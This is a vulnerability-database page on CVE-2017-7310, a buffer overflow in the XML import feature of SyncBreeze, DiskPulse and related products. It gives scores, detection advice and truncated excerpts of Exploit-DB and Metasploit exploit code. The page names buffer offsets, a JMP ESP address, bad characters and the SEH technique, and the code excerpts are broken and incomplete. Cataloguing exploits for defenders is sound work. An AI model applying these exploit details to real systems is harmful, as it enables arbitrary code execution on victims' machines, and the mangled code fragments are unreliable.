CVE-2017-7310
published 2017-03-29CVE-2017-7310: A buffer overflow vulnerability in Import Command in SyncBreeze before 10.6, DiskSorter before 10.6, DiskBoss before 8.9, DiskPulse before 10.6, DiskSavvy…
PriorityP262high7.8CVSS 3.0
AVLACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
53.65%
98.9th percentile
A buffer overflow vulnerability in Import Command in SyncBreeze before 10.6, DiskSorter before 10.6, DiskBoss before 8.9, DiskPulse before 10.6, DiskSavvy before 10.6, DupScout before 10.6, and VX Search before 10.6 allows attackers to execute arbitrary code via a crafted XML file containing a long name attribute of a classify element.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flexense | diskboss | — | — |
| flexense | disksorter | — | — |
| flexense | syncbreeze | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x7A\xB7\x1B\x65
bytes↗
\x8D\x44\x24\x4C
- →The exploit delivers a specially crafted XML file containing a long 'name' attribute of a 'classify' element to trigger the buffer overflow via the Import Command feature. ↗
- →The exploit uses a JMP ESP gadget located in QtGui4.dll at address 0x10015FFE; monitor for ROP/SEH chains referencing this module in affected products. ↗
- →The exploit payload uses bad characters \x00\x01\x02\x0a\x0b\x0c\x22\x27 and a stack adjustment of -3500; shellcode in XML imports for these products should be flagged. ↗
- →The exploit uses SEH (Structured Exception Handler) overwrite technique (EXITFUNC=seh); monitor for SEH chain corruption in SyncBreeze, DiskPulse, DupScout, and related processes during XML import. ↗
- →The initial junk buffer for SyncBreeze 9.5.16 is 1536 bytes of 'A', and for DiskPulse 10.4.18 is 1560 bytes; anomalously large 'name' attribute values in XML files imported by these products indicate exploitation attempts. ↗
- →DiskPulse exploit uses 1560-byte junk buffer; monitor for XML files with oversized classify element name attributes submitted to DiskPulse Enterprise import functionality. ↗
- ·The JMP ESP gadget address (0x10015FFE in QtGui4.dll) is version-specific to SyncBreeze Enterprise 9.5.16 on Windows 7 SP1 x86; the offset and return address will differ across other affected product versions and OS configurations. ↗
- ·The exploit was tested on Windows 7 SP1 x86 only; behavior on other Windows versions or x64 architectures is not confirmed by the exploit author. ↗
- ·The vulnerability affects multiple products (SyncBreeze, DiskSorter, DiskBoss, DiskPulse, DiskSavvy, DupScout, VX Search) all before version 10.6; each product/version combination may require different offsets and gadget addresses. ↗
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)
exploitdb·2018-02-21·CVSS 7.8
CVE-2017-7310 [HIGH] Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)
Disk Pulse Enterprise 10.4.18 - 'Import Command' Buffer Overflow (SEH)
---
#!/usr/bin/env python
# Exploit Title: Disk Pulse Enterprise v10.4.18 - 'Import Command' Buffer Overflow (SEH)
# Date: 2018-01-22
# Exploit Author: Daniel Teixeira
# Author Homepage: www.danielteixeira.com
# Vendor Homepage: http://www.diskpulse.com
# Software Link: http://www.diskpulse.com/setups/diskpulseent_setup_v10.4.18.exe
# Version: 10.4.16
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2017-7310
import os,struct
#Buffer overflow
junk = "A"*1560
#JMP ESP (QtGui4.dll)
jmpesp= struct.pack('\n'
f = open('Exploit.xml', 'w')
f.write(file)
f.close()
Exploit-DB
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
exploitdb·2018-01-24
CVE-2017-7310 Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
'Description' => %q(
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
by using the import command option to import a specially crafted xml file.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira'
],
'References' =>
[
[ 'CVE', '2017-7310' ],
[ 'EDB', '41773' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'DisablePayloadHandler' => 'true'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
'StackAdjustment' => -3500
Exploit-DB
Sync Breeze Enterprise 9.5.16 - 'Import Command' Local Buffer Overflow
exploitdb·2017-03-29
CVE-2017-7310 Sync Breeze Enterprise 9.5.16 - 'Import Command' Local Buffer Overflow
Sync Breeze Enterprise 9.5.16 - 'Import Command' Local Buffer Overflow
---
#!/usr/bin/env python
# Exploit Title: Sync Breeze Enterprise 9.5.16 - 'Import Command' Buffer Overflow (SEH)
# Date: 2017-03-29
# Exploit Author: Daniel Teixeira
# Author Homepage: www.danielteixeira.com
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.5.16.exe
# Version: 9.5.16
# Tested on: Windows 7 SP1 x86
import os,struct
#Buffer overflow
junk = "A" * 1536
#JMP ESP (QtGui4.dll)
jmpesp= struct.pack('\n'
f = open('Exploit.xml', 'w')
f.write(file)
f.close()
Metasploit
Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
metasploit
Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow
This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file.
Metasploit
Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow
metasploit
Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow
Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16 by using the import command option to import a specially crafted xml file.
No writeups or analysis indexed.
http://www.diskboss.com/news.htmlhttp://www.diskpulse.com/news.htmlhttp://www.disksavvy.com/news.htmlhttp://www.disksorter.com/news.htmlhttp://www.dupscout.com/news.htmlhttp://www.securityfocus.com/bid/97237http://www.syncbreeze.com/news.htmlhttp://www.vxsearch.com/news.htmlhttps://www.exploit-db.com/exploits/41771/https://www.exploit-db.com/exploits/41772/https://www.exploit-db.com/exploits/41773/https://www.exploit-db.com/exploits/43875/https://www.exploit-db.com/exploits/44157/http://www.diskboss.com/news.htmlhttp://www.diskpulse.com/news.htmlhttp://www.disksavvy.com/news.htmlhttp://www.disksorter.com/news.htmlhttp://www.dupscout.com/news.htmlhttp://www.securityfocus.com/bid/97237http://www.syncbreeze.com/news.htmlhttp://www.vxsearch.com/news.htmlhttps://www.exploit-db.com/exploits/41771/https://www.exploit-db.com/exploits/41772/https://www.exploit-db.com/exploits/41773/https://www.exploit-db.com/exploits/43875/https://www.exploit-db.com/exploits/44157/
2017-03-29
Published